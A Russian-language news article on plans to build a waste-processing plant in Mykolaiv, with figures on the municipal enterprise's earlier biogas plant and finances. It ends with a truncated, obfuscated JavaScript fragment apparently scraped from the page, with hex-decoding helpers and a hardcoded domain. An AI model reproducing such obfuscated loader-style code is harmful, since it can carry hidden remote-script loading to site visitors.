В Николаеве построят завод по переработке мусора

Предприятие будет работать по западным стандартам

КП «Николаевкоммунтранс» в этом году планирует вместе с компанией «ЛНК» реализовать проект по строительству завода по комплексной переработке мусора, — сообщил директор предприятия Юрий Мостовой, отчитываясь о работе КП в 2015 году. Вопрос рассматривался на заседании постоянной комиссии Николаевского городского совета по вопросам жилищно-коммунального хозяйства, коммунальной собственности и благоустройства города, во вторник, 22 марта.

По его словам, в прошлом году был успешно реализован первый инвестиционный проект с компанией «ЛНК» – за 7 месяцев был возведён завод по переработке биогаза и производству электроэнергии. Это предприятие приносит прежде всего экологический эффект, поскольку на городской свалке из-за выбросов метана почти каждый год были пожары. Годовая мощность завода – 1 мегаватт, что составляет примерно 3% от потребности города в год.

Потому решено реализовать второй инвестпроект с этой компанией – строительство завода по комплексной переработке ТБО по тем технологиям, по которым работает западный мир. Он добавил, что завод планируют построить на территории Николаевского района, поскольку на территории полигона места для него нет.

По словам Юрия Мостового, «работа предприятия стабильная» – там работают 54 человека, чистая прибыль составила 1,355 млн грн, около 8 млн грн было уплачено в различные государственные фонды.

На предприятии три структурных подразделения: полигон твёрдых бытовых отходов, абонентская служба и участок вторсырья. В течение последних нескольких лет ведётся капремонт основных средств – отремонтирована вся техника, которой хоть и по 15-20 лет, но она вся на ходу. Также КП ведёт активную общественную деятельность – помогает воинским частям (за 2 года восстановлено 10 машин, которые отправлены в зону АТО) и детям-сиротам.

14 марта китайская компания COFCO открыла новый терминал в Николаеве.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "hubs.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

*

Top